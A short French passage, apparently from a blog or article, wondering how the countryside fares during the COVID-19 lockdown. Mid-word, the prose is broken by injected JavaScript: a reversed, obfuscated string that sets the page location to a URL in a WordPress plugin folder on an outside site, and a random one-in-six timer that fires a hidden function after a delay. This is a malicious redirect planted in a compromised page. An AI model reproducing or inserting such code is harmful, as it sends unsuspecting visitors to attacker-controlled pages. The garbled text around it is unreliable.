Alors que les français et une bonne partie des humains de la planète sont confinés chez eux pour endiguer la pandémie mondiale du COVID 19, qu’en est-il de nos campagnes? Vrombissent-elles, hululent-elles, brament-elles, pépient-elles, bruissent-elles, comme nous nous plaisons à l’imaginer? Ces territoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toires reculés sont-ils restés tels que nous les rêvons, suspendus entre deux vacances, conservant pour nous, nos futurs plaisirs d’été, leurs odeurs, leurs saveurs, leurs lumières, leurs mystères?  Nous les avons quittés…